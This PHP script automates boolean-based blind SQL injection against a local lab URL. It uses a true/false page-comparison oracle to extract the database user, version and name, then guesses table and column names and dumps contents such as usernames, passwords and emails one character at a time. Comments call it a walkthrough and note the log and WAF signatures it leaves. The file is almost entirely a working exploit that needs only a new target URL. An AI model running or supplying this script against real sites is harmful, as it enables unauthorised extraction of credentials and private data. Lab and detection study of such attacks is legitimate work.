<?php
// Boolean-based blind SQL injection walkthrough against a local lab target.
// Every probe below is appended verbatim to the query string (the '+' characters
// stand in for URL-encoded spaces), and the only information the script ever
// reads back is whether the page body is byte-identical to a known "true"
// response. The server-side defect being demonstrated is a `comment` parameter
// that is concatenated into SQL instead of bound through a prepared statement;
// the client code does no parameterisation of its own.
$url = "http://localhost/playground/sqli/blind/blind.php?comment=1";

// Fixed guess lists: table and column names are not discovered, only tested.
$tables = [
    "table_user",
    "table_content",
    "table_comment",
    "table_users",
    "table_member",
    "table_admin",
    "table_halaman"
];
$columns = [
    "uname",
    "user",
    "name",
    "username",
    "password",
    "email",
    "id",
    "comment",
    "judul",
    "content"
];

// Candidate alphabet for one-character-at-a-time comparison: '+' and ',' plus
// the printable ASCII range from '-' (0x2D) up to '~' (0x7E). range() with
// string endpoints walks character codes; sort() puts the result in byte order.
// Note '+' is kept because a literal space would be sent as '+' in the URL.
$datas = ["+",","];
$datas = array_merge($datas,range("~","-"));
sort($datas);

//list of query
// $query1 holds the true/false oracle pair; $query2 the expressions whose
// values are read out later (MySQL builtins plus the file_priv column of mysql.user).
$query1 = array("+and+false","+and+true");
$query2 = array("user()","version()","database()","(SELECT+file_priv+FROM+mysql.user+LIMIT+0,1)");

//test for sql injection
// Oracle detection: two requests that differ only by a trailing boolean. If the
// bodies differ, the boolean reached the database. A server that answered with
// a uniform page for every value of `comment` would not expose this bit.
// Defensive signal: paired requests differing only in an appended `and true` /
// `and false` are a recognisable pattern in access logs.
// NOTE(review): file_get_contents() returns false on a transport failure; the
// script does not check for that, so a failed fetch is treated like a body.
$req1 = file_get_contents($url . $query1[0]);
$req2 = file_get_contents($url . $query1[1]);
if($req1 !== $req2){
    echo "\n[+] probably, it's possible to blind sql injection\n";
}else{
    die("\n[-] we're not sure that it's possible to blind sql injection\n");
}

//checking version,user,and database name
// For each expression in $query2, compare one character at a time (BINARY
// makes the comparison case-sensitive) against every candidate in $datas
// until the response matches the known-true body ($req2). Up to 20 positions
// times the size of $datas is several hundred requests per value - a burst of
// near-identical requests carrying `substring(` in the query string, which is
// what request-log review or a WAF rule would catch.
echo "[+] we're looking for common information of it's database\n";
foreach($query2 as $x){
    if($x == "(SELECT+file_priv+FROM+mysql.user+LIMIT+0,1)"){
        echo "\n[*] FILE_PRIV\t: ";
    }else{
        // Label derived from the builtin name: "user()" -> "USER".
        $zz = strtoupper(str_replace("()","",$x));
        echo "\n[*] {$zz}\t: ";
    }
    for($itung = 1; $itung <= 20; $itung++):
        foreach($datas as $z){
            $query = "+and+BINARY+substring({$x},{$itung},1)='{$z}'";
            $req = file_get_contents($url . $query);
            if($req === $req2):
                echo $z;
                break;
            endif;
        }
        // sleep() takes whole seconds; without strict_types the float is coerced
        // to 0, so there is effectively no pause between positions (PHP 8.1+
        // also emits a deprecation notice for the lossy conversion).
        sleep(0.30);
    endfor;
}
echo "\n\n";

// Table existence check: `(SELECT 1 FROM <name> LIMIT 0,1)=1` is true only when
// the table exists and has at least one row; anything else (including a SQL
// error on an unknown table) produces the non-matching body. Only names from
// the fixed $tables list are ever tried.
$table_found = array();
echo "[+] we are looking for table name\n\n";
foreach($tables as $x){
    $query = "+and+(SELECT+1+FROM+{$x}+LIMIT+0,1)=1";
    $req = file_get_contents($url . $query);
    if($req === $req2):
        echo "[*] {$x}\n";
        $table_found[] = $x;
    endif;
}
echo "\n";

// Column probe + read-out. CONCAT(1, col) always starts with '1' when the
// column exists, so the outer comparison is an existence test for each guessed
// column. The inner loop then reads up to 100 characters of group_concat(col)
// with the same per-character oracle used above.
echo "[+] dumping the whole of datas of all the tables\n\n";
foreach($table_found as $x){
    echo "[+] from table {$x}\n\n";
    foreach($columns as $z){
        $query = "+AND+(SELECT+SUBSTRING(CONCAT(1,{$z}),1,1)+FROM+{$x}+LIMIT+0,1)=1";
        $req = file_get_contents($url . $query);
        if($req === $req2):
            echo "[*] {$z}\t : ";
            for($xx = 1;$xx <= 100; $xx++):
                foreach($datas as $zz){
                    // Reuses the $query1 name from the oracle pair above as a
                    // string; harmless since the array is no longer read, but
                    // easy to misread.
                    $query1 = "+and+BINARY+substring((SELECT+group_concat({$z})+FROM+{$x}),{$xx},1)='{$zz}'";
                    $req = file_get_contents($url . $query1);
                    if($req === $req2):
                        // '+' in the candidate set was a URL-encoded space; print it as one.
                        if($zz === "+"):
                            $zz = " ";
                        endif;
                        echo $zz;
                        break;
                    endif;
                }
            endfor;
            echo "\n";
        endif;
    }
    echo "\n";
}
?>